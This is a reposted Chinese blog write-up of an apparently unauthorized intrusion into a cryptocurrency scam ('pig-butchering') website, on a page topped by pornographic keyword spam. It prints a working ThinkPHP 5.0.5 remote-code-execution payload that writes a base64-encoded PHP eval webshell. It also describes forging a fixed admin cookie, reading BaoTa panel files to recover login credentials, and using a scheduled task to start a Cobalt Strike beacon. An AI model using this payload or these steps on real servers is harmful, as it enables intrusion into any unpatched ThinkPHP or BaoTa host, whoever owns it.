日韩性视频-久久久蜜桃-www中文字幕-在线中文字幕av-亚洲欧美一区二区三区四区-撸久久-香蕉视频一区-久久无码精品丰满人妻-国产高潮av-激情福利社-日韩av网址大全-国产精品久久999-日本五十路在线-性欧美在线-久久99精品波多结衣一区-男女午夜免费视频-黑人极品ⅴideos精品欧美棵-人人妻人人澡人人爽精品欧美一区-日韩一区在线看-欧美a级在线免费观看

歡迎訪問 生活随笔!

生活随笔

當前位置: 首頁 > 编程资源 > 编程问答 >内容正文

编程问答

干货|对某杀猪盘的渗透测试

發布時間:2024/1/23 编程问答 38 豆豆
生活随笔 收集整理的這篇文章主要介紹了 干货|对某杀猪盘的渗透测试 小編覺得挺不錯的,現在分享給大家,幫大家做個參考.

最近偶然發現一個虛擬貨幣買漲跌的殺豬盤,遂進行了一波測試,前臺長這樣。

為thinkphp5.0.5隨用RCE進行打入,成功寫入webshell。

s=index|think\app/invokefunction &function=call_user_func_array&vars[0]=assert &vars[1][]=@file_put_contents(base64_decode(MTIzNDUucGhw),base64_decode(MMTI8P3BocCBldmFsKEAkX1BPU1RbJ2EnXSk7))

查看發現phpinfo信息發現已經禁用所有能夠執行系統命令的函數,且com和dl加載都不能用無法執行相應的系統命令如下所示:

assert,system,passthru,exec,pcntl_exec,shell_exec,popen,proc_open

//php如上系統命令都已經禁用

但有文件的讀寫權限沒有禁用assert(),file_put_contents()等函數,查看后發現windows系統如下所示:

由于php執行系統命令的函數都被禁用勒,從而導致無法執行系統命令很難受,之后下載了他的網站源碼簡單看了一波,發現其管理員cookie固定且可以偽造如下所示,看著像后門:

故可后臺登錄繞過,管理員cookie固定,添加cookie字段即可登錄繞過。瀏覽器f12,在cookie中添加上述鍵值訪問index,即可成功后臺登錄如下所示好多錢(被騙的人好多):

前臺詢問客服了解到轉賬賬戶(該殺豬盤運作方式是用戶將錢打入客服提供的賬戶后,用戶再在自己的賬號沖入相應數值的資金至后臺審核,審核后即可使用數值的前進行貨幣的漲跌投資買賣交易),留作證據上交:

由于之前一直無法執行系統命令,想要突破一下就開始翻他服務器上的文件,翻閱文件發現存在寶塔的文件夾,探測發現確實開放8888端口存在寶塔服務但默認登錄入口已被修改,如下所示:

翻閱寶塔文件發現存儲路徑的文件名admin_path.pl,如下所示:

找到寶塔登錄入口,成功訪問該登錄入口,如下所示:

繼續翻閱發現一個default.pl的文件,該文件中存放的是相應的登錄密碼:

拿到密碼嘗試了默認用戶名發現不對不能登錄,繼續翻文件default.db文件是記錄登錄記錄的,找到登錄賬號:

利用賬號密碼成功登錄寶塔管理后臺,如下所示:利用賬號密碼成功登錄寶塔管理后臺,如下所示:

找到定時任務處修改計劃任務執行cs上線馬,上線后在將計劃任務改回,如下所示:

cs成功上線如下所示:

查看ip僅有公網地址無內網,同C段還有其他幾臺部署的都是同一套東西就不再往下搞了:

總的就這樣,沒啥東西比較無味。

總結

以上是生活随笔為你收集整理的干货|对某杀猪盘的渗透测试的全部內容,希望文章能夠幫你解決所遇到的問題。

如果覺得生活随笔網站內容還不錯,歡迎將生活随笔推薦給好友。